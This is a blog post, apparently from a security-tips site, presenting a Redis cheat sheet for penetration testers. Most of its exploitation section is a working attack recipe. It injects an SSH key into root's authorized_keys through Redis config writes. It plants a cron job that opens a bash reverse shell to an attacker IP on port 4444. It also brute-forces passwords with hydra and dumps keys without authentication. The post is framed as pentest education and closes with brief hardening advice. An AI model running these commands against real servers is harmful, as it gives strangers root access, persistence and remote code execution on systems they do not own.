Route Zero: Security Tools, Tips & Recs | Redis Cheat Sheet for Penetration Testers

Redis is an in-memory key-value store commonly used for caching and message brokering. It typically runs on TCP port 6379. When misconfigured, Redis can expose sensitive data, allow unauthorized access, or even lead to remote code execution (RCE) or persistence via SSH key injection.

1. Port Scanning & Detection

Nmap Scan

nmap -p 6379 --script redis-info <target>

Checks if Redis is running and gathers basic info.

Banner Grabbing

nc <target> 6379

Then type:

INFO

2. Connecting to Redis (Unauthenticated)

Using redis-cli

redis-cli -h <target> -p 6379

For basic interaction.

List All Keys

KEYS *

Get Value of a Key

GET <key>

3. Exploitation Scenarios

✅ Privilege Escalation via SSH Key Injection

If Redis runs as root and allows write access:

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > pub.txt
cat pub.txt | redis-cli -h <target> -x set crackit
redis-cli -h <target> config set dir /root/.ssh/
redis-cli -h <target> config set dbfilename "authorized_keys"
redis-cli -h <target> save

Then SSH into the server using your private key.

RCE via Cron (if writable dir)

echo -e "* * * * * bash -i >& /dev/tcp/attacker_ip/4444 0>&1" > cron.txt
cat cron.txt | redis-cli -h <target> -x set cronjob
redis-cli -h <target> config set dir /var/spool/cron/
redis-cli -h <target> config set dbfilename root
redis-cli -h <target> save

Establishes reverse shell through cron.

4. Authentication Bypass / Info Leak

Check for Auth Requirement

redis-cli -h <target> info

If requirepass is not set, no password is needed.

Brute-Force Redis Password

hydra -s 6379 -P wordlist.txt <target> redis

Authenticated Connection

redis-cli -h <target> -a <password>

5. Useful Commands

Command	Description
`INFO`	Shows server stats
`CONFIG GET *`	Dumps configuration
`FLUSHALL`	Deletes all keys
`KEYS *`	Lists all keys
`GET <key>`	Retrieves value of a key
`SET <key> <value>`	Sets a key to a value
`SAVE`	Saves current state to disk
`CONFIG SET`	Changes Redis settings (e.g., path)

Conclusion

Redis misconfigurations can lead to significant security issues, from unauthorized data access to remote command execution. Proper configuration, access control, and regular audits are key to securing Redis deployments.

Discover more from Route Zero: Security Tools, Tips & Recs

Subscribe to get the latest posts sent to your email.

Latest Posts

APPRENTICE – DOM XSS in innerHTML sink using source location.search

September 13, 2025
APPRENTICE – DOM XSS in document.write sink using source location.search

September 13, 2025
APPRENTICE – Stored XSS into HTML context with nothing encoded

September 13, 2025
APPRENTICE – XSS into HTML context with nothing encoded

September 13, 2025

Redis Cheat Sheet for Penetration Testers

1. Port Scanning & Detection

Nmap Scan

2. Connecting to Redis (Unauthenticated)

Using redis-cli

List All Keys

3. Exploitation Scenarios

✅ Privilege Escalation via SSH Key Injection

4. Authentication Bypass / Info Leak

Check for Auth Requirement

5. Useful Commands

Conclusion

Share this:

Like this:

Discover more from Route Zero: Security Tools, Tips & Recs

Latest Posts

APPRENTICE – DOM XSS in innerHTML sink using source location.search

APPRENTICE – DOM XSS in document.write sink using source location.search

APPRENTICE – Stored XSS into HTML context with nothing encoded

APPRENTICE – XSS into HTML context with nothing encoded

Discover more from Route Zero: Security Tools, Tips & Recs